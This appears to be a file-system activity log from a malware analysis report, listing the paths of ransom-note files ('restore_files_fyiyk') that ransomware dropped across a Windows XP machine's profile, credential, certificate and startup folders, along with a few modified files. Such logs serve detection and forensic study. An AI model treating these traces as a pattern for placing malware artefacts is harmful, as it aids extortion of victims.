%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\25\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\60\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\PrintHood\restore_files_fyiyk.html (5 bytes)
C:\RECYCLER\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\54\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Wireshark\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\2\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\HTML Help\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\My Playlists\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\59\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\History\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\JavaScripts\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\47\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\NetHood\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\UserData\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\23\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\My Documents\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\14\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\8\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Favorites\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\37\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\muffin\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\14\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\WinPcap\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\59\restore_files_fyiyk.html (5 bytes)
C:\System Volume Information\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Templates\powerpnt.ppt (454 bytes)
%Documents and Settings%\NetworkService\Local Settings\History\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\My Documents\My Music\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\KTOR0Z81\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\48\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\53\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\33\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\63\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Forms\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\40\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Playlists\00064D96\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\S-1-5-20\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Identities\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\My Documents\Recovery_File_koseqijge.txt (250 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\12\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.html (5 bytes)
C:\RECYCLER\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\22\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\E7VJ4HGS\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\0\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Desktop\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\6\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#kiks.yandex.ru\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Favorites\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\0\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\51\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\19\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\51\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\4\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\12\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\53\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\16\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\16\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\19\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-19\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Playlists\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\56\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\55\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Protect\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\2\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\43\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\History\History.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\48\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\3\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\History\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\29\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Desktop\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\jre1.6.0_18\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Templates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\57\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\SendTo\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\History\History.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Identities\{37E80C13-CB45-4DCE-A438-545B791476AC}\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Total Commander\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\History\History.IE5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\41\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\My Documents\My Pictures\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\1\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\KTOR0Z81\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\15\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\12\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Recent\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\My Documents\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\HTML Help\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Startup\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\31\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\4\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\18\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Cookies\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Recent\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\34\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\11\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\60\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\2\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\13\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\7\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\48\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg (1181 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\41\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ip[1].htm (15 bytes)
C:\totalcmd\LANGUAGE\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\44\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\6\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\36\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\28\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\27\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Cookies\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\Install\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\14\restore_files_fyiyk.html (5 bytes)
C:\System Volume Information\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temp\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\restore_files_fyiyk.txt (2 bytes)
C:\totalcmd\DEFAULT.BAR (2816 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\14\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Collab\restore_files_fyiyk.html (5 bytes)
%System%\config\software (2374 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\My Documents\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\51\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\8\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\15\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\46\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Favorites\Links\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-20\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\45\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Forms\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\49\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\22\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\35\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Wireshark\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\53\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Wireshark\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\8\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Videos\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\29\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\46\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\34\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\29\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\25\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\WinPcap\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\My Documents\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\System Tools\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\Internet Explorer\brndlog.txt (1116 bytes)
